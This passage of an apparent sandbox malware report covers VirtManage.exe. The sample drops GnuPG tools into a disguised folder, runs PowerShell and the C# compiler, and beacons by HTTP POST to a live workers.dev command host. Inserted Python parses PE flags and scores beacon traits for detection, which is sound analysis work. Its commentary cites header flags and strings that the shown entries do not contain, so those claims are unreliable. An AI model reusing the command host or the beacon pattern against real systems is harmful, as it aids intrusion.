Source: VirtManage.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb | source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp, MSI32C4.tmp.9.dr
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb= | source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp, MSI32C4.tmp.9.dr
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.pdb | source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb | source: powershell.exe, 0000001E.00000002.1249340927.0000016E3046D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OLEView.pdb | source: 7za.exe, 00000013.00000003.1010646142.000001AC45EBA000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000013.00000003.1010553824.000001AC45EEA000.00000004.00001000.00020000.00000000.sdmp, oleview.exe, 0000001A.00000002.3333907718.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001A.00000000.1077218028.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001D.00000002.1300919090.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp, oleview.exe, 0000001D.00000000.1185413739.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 0000001E.00000002.1251740114.0000016E30589000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb]mb-) | source: powershell.exe, 0000001E.00000002.1251921332.0000016E305A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb | source: powershell.exe, 0000001E.00000002.1218645117.0000016E1620A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Pn.pdb | source: powershell.exe, 0000001E.00000002.1249340927.0000016E3046D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OLEView.pdbGCTL | source: 7za.exe, 00000013.00000003.1010646142.000001AC45EBA000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000013.00000003.1010553824.000001AC45EEA000.00000004.00001000.00020000.00000000.sdmp, oleview.exe, 0000001A.00000002.3333907718.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001A.00000000.1077218028.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001D.00000002.1300919090.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp, oleview.exe, 0000001D.00000000.1185413739.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.pdbhP | source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: tomation.pdb{AD.v | source: powershell.exe, 0000001E.00000002.1251740114.0000016E30589000.00000004.00000020.00020000.00000000.sdmp
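The two "Static PE information" entries for VirtManage.exe above list its COFF Characteristics and DllCharacteristics. Read together they contain a point worth recording in triage: DYNAMIC_BASE requests ASLR, but RELOCS_STRIPPED means the image carries no relocation data, so the loader cannot rebase it and the image always lands at its preferred ImageBase. The NSIS error string found in the sample (http://nsis.sf.net/NSIS_Error) identifies the outer binary as an NSIS installer; this check is about the stub, not the dropped GnuPG files. The following Python is added here as an example and is not part of the Joe Sandbox report or of the sample: it parses both flag words and the base-relocation directory from a PE header and records that finding. The flag values are the winnt.h constants; the header bytes fed to it are constructed inline for the demonstration.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits, values from winnt.h
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits, values from winnt.h
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

IMAGE_DIRECTORY_ENTRY_BASERELOC = 5


def parse_pe_flags(data: bytes) -> dict:
    """Read Characteristics, DllCharacteristics and the size of the
    base-relocation directory from a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER (20 bytes)
    machine, _nsect, _ts, _sym, _nsym, _optsz, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    dirs = opt + (96 if magic == 0x10B else 112)              # first IMAGE_DATA_DIRECTORY
    n_dirs = struct.unpack_from("<I", data, dirs - 4)[0]      # NumberOfRvaAndSizes
    reloc_size = 0
    if n_dirs > IMAGE_DIRECTORY_ENTRY_BASERELOC:
        _rva, reloc_size = struct.unpack_from("<II", data, dirs + IMAGE_DIRECTORY_ENTRY_BASERELOC * 8)
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "characteristics": [n for bit, n in FILE_CHARACTERISTICS.items() if chars & bit],
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
        "reloc_dir_size": reloc_size,
    }


def assess_mitigations(flags: dict) -> list:
    """Findings a triage analyst would record from the flags alone."""
    notes = []
    fc, dc = flags["characteristics"], flags["dll_characteristics"]
    if "DYNAMIC_BASE" not in dc:
        notes.append("no ASLR opt-in (DYNAMIC_BASE clear)")
    elif "RELOCS_STRIPPED" in fc or flags["reloc_dir_size"] == 0:
        notes.append("DYNAMIC_BASE set but relocations stripped: the loader cannot rebase "
                     "the image, so it loads at its preferred ImageBase and ASLR is ineffective")
    if "NX_COMPAT" not in dc:
        notes.append("no DEP opt-in (NX_COMPAT clear)")
    return notes


def build_sample_pe(characteristics: int, dll_characteristics: int, reloc_size: int = 0) -> bytes:
    """Constructed minimal PE32 header for the demonstration; not a runnable image."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))                              # e_lfanew
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, characteristics)  # i386, 1 section
    opt = bytearray(224)                                                     # PE32 header with 16 directories
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + IMAGE_DIRECTORY_ENTRY_BASERELOC * 8, 0, reloc_size)
    return bytes(dos) + b"PE\0\0" + file_header + bytes(opt)


if __name__ == "__main__":
    # Flag words matching the two "Static PE information" entries for VirtManage.exe
    flags = parse_pe_flags(build_sample_pe(0x010F, 0x8540))
    print(flags["characteristics"], flags["dll_characteristics"])
    for note in assess_mitigations(flags):
        print("-", note)
```

To run it against the real file, replace the constructed header with `open(path, "rb").read()`; the parser only touches the headers, so the image size does not matter.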
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\svchost.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_004068D4 FindFirstFileW,FindClose | 0_2_004068D4
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_00405C83
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00402930 FindFirstFileW | 0_2_00402930
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose | 1_2_004CC650
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 3_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose | 3_2_004CC650
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 4x nop then push esi | 1_2_0049C5F0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 4x nop then push esi | 3_2_0049C5F0
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Code function: 1_2_004016A0 npth_unprotect,__assuan_recvmsg,npth_protect | 1_2_004016A0
Source: global traffic | DNS traffic detected: DNS query: ec2-52-14-160-176.us-east-2.compute.amazonaws.com
Source: global traffic | DNS traffic detected: DNS query: cdn-app-web2.lenete5970.workers.dev
Source: unknown | HTTP traffic detected:
POST //A3C3Spv34bE/ HTTP/1.1
User-Agent: Microsoft Windows NT 10.0.19045.0
Content-Type: application/json
Host: cdn-app-web2.lenete5970.workers.dev
Content-Length: 111
Expect: 100-continue
Connection: Keep-Alive
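The POST above is the sample's beacon, and its header set is the detectable part: a JSON body to a workers.dev host under an opaque token path, a User-Agent that is nothing but the Windows version string, and Expect: 100-continue. "Microsoft Windows NT 10.0.19045.0" is the format of .NET's Environment.OSVersion.VersionString, and a .NET Framework HttpWebRequest adds Expect: 100-continue to POSTs by default, which fits the C# compilation and PowerShell activity recorded elsewhere in this report. The following Python is added as an example and is not part of the Joe Sandbox report: it parses an HTTP request head and scores these traits. The beacon text is reconstructed from the entry above with its line breaks restored and the body omitted; the benign request, the watched host-suffix list and the alert threshold of three traits are constructed assumptions to tune locally.

```python
import re
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)   # header names lower-cased


def parse_request_head(raw: str) -> HttpRequest:
    """Parse the request line and headers of an HTTP/1.1 request head (CRLF or LF)."""
    lines = raw.replace("\r\n", "\n").split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line terminates the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


# Format of Environment.OSVersion.VersionString on Windows: "Microsoft Windows NT major.minor.build.revision"
DOTNET_VERSION_STRING_UA = re.compile(r"^Microsoft Windows NT \d+\.\d+\.\d+\.\d+$")
# Assumption: host suffixes this environment treats as high-risk; extend locally
WATCHED_HOST_SUFFIXES = (".workers.dev",)
# A path that is only a short opaque token, e.g. //A3C3Spv34bE/
TOKEN_PATH = re.compile(r"/+[A-Za-z0-9]{8,16}/?")
BEACON_THRESHOLD = 3   # assumption: number of traits before a request is flagged


def beacon_traits(req: HttpRequest) -> list:
    """Return the names of the beacon-like traits this request exhibits."""
    traits = []
    host = req.headers.get("host", "").lower()
    if req.method == "POST" and req.headers.get("content-type", "").startswith("application/json"):
        traits.append("json-post")
    if DOTNET_VERSION_STRING_UA.match(req.headers.get("user-agent", "")):
        traits.append("os-version-only-user-agent")
    if req.headers.get("expect", "").lower() == "100-continue":
        traits.append("expect-100-continue")
    if host.endswith(WATCHED_HOST_SUFFIXES):
        traits.append("watched-host-suffix")
    if TOKEN_PATH.fullmatch(req.path):
        traits.append("opaque-token-path")
    return traits


def is_suspected_beacon(req: HttpRequest) -> bool:
    return len(beacon_traits(req)) >= BEACON_THRESHOLD


# Reconstructed from the HTTP traffic entry above (line breaks restored, body omitted)
SAMPLE_BEACON = (
    "POST //A3C3Spv34bE/ HTTP/1.1\r\n"
    "User-Agent: Microsoft Windows NT 10.0.19045.0\r\n"
    "Content-Type: application/json\r\n"
    "Host: cdn-app-web2.lenete5970.workers.dev\r\n"
    "Content-Length: 111\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed benign request for contrast
SAMPLE_BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for raw in (SAMPLE_BEACON, SAMPLE_BENIGN):
        req = parse_request_head(raw)
        print(req.method, req.headers.get("host"), beacon_traits(req), is_suspected_beacon(req))
```

None of the traits is conclusive alone: legitimate in-house .NET tooling also sends Expect: 100-continue and a bare version-string User-Agent. Scoring the combination, and pairing it with the DNS entries above for the same workers.dev host, is what makes it usable as a proxy-log rule.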
Source: csc.exe, 00000021.00000003.1271041607.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274600641.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.HijriCalendar.debug.jsT
Source: csc.exe, 00000021.00000003.1271041607.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274600641.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.HijriCalendar.jsT
Source: csc.exe, 00000021.00000003.1271041607.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274600641.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.UmAlQuraCalendar.debug.jsT
Source: csc.exe, 00000021.00000003.1271041607.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1274600641.000001F1C7AC5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.UmAlQuraCalendar.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjax.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjax.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxApplicationServices.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxApplicationServices.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxComponentModel.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxComponentModel.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxCore.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxCore.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxGlobalization.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxGlobalization.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxHistory.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxHistory.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxNetwork.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxNetwork.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxSerialization.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxSerialization.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxTimer.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxTimer.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebForms.debug.jsT
Source: csc.exe, 00000021.00000003.1270707048.000001F1C7ABE000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270571300.000001F1C7ABA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270800154.000001F1C7AC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebForms.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebServices.debug.jsT
Source: csc.exe, 00000021.00000003.1270603484.000001F1C7AD0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270262741.000001F1C7AC6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000003.1270459826.000001F1C7ACC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000021.00000002.1275422174.000001F1C7AD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxWebServices.jsT
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB50F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB5129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB5771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cdn-app-web2.lenete5970.workers.dev
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.dr | String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
